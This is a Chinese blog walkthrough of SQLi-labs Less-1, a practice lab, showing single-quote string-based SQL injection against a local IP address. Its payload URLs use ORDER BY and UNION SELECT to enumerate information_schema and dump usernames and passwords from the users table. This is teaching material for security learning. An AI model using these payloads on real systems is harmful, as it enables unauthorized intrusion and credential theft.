Less-1:单引号字符型 SQL 注入
462 字
2 分钟
Less-1:单引号字符型 SQL 注入
一、正常访问

页面提示需要传入一个 id 参数:
http://192.168.1.17:8082/Less-1/?id=1
接着尝试在参数后面添加单引号,判断是否存在注入点:
http://192.168.1.17:8082/Less-1/?id=1'
页面返回 SQL 报错,说明传入的单引号参与了后端 SQL 语句拼接。

后续可以使用 --+ 注释掉后面的 SQL 语句,从而消除多余内容导致的语法错误。
二、判断查询字段数
使用 order by 逐步判断当前查询语句的字段数:
http://192.168.1.17:8082/Less-1/?id=1' order by 1 --+http://192.168.1.17:8082/Less-1/?id=1' order by 2 --+http://192.168.1.17:8082/Less-1/?id=1' order by 3 --+http://192.168.1.17:8082/Less-1/?id=1' order by 4 --+当 order by 4 页面报错时,说明当前查询语句只有 3 个字段。

确认字段数后,再使用 union select 判断页面的回显位置:
http://192.168.1.17:8082/Less-1/?id=1' and 1=2 union select 1,2,3 --+
从页面结果可以看到,第 2 列和第 3 列会回显到页面上。
三、查询数据库信息
先使用 MySQL 自带的 database() 函数查询当前数据库名:
http://192.168.1.17:8082/Less-1/?id=1' and 1=2 union select 1,2,database() --+
再通过 information_schema.tables 查询 security 数据库中的表名:
http://192.168.1.17:8082/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+这里使用 group_concat() 将多个表名合并到同一列中,方便在页面回显位置查看。

接下来以 users 表为例,查询该表中的字段名:
http://192.168.1.17:8082/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
可以看到,users 表中有 3 个字段,分别是 id、username、password。
最后根据字段名查询表中的数据:
http://192.168.1.17:8082/Less-1/?id=1' and 1=2 union select 1,2,group_concat(username,':',password) from users --+
通过页面回显,可以获取 users 表中的用户名和密码数据。
文章分享
如果这篇文章对你有帮助,欢迎分享给更多人!
Less-1:单引号字符型 SQL 注入
https://ld.ac.cn/posts/less-1-single-quote-sql-injection/ 相关文章 智能推荐
1
NodeWarden:把你的密码库搬到 Cloudflare Workers 上,不要服务器
技术教程 NodeWarden 是运行在 Cloudflare Workers 上的 Bitwarden 兼容密码管理服务端。不需要 VPS,不需要 Docker,Fork 一下连接 CF 即可一键部署,自带 PWA 离线访问和云端备份。
2
Termius 土耳其区订阅攻略:一年仅需 20 元
技术教程 利用微软土耳其区定价差异,把 Termius Premium 的年费从 $79.99 降到 ₺85(约 20 元人民币),老版本安装 + 土区账号 + 礼品卡全套操作手册。
3
家庭媒体中心全家桶部署教程:CD2 + Emby + Symedia + Redia
技术教程 基于 Docker Compose 的完整媒体库搭建教程,从 CloudDrive2 挂载网盘到 Symedia 刮削、Emby 海报墙再到 Redia 302 直链播放,一步步教你搭建属于你自己的家庭媒体中心。
4
机械革命蛟龙16K 睡眠无法唤醒修复教程
技术教程 解决 Arch Linux 下 NVIDIA 独显笔记本睡眠无法唤醒的问题
5
欢迎来到人生实验室
随笔 这是我的第一篇博客文章,记录博客的开始。
随机文章 随机推荐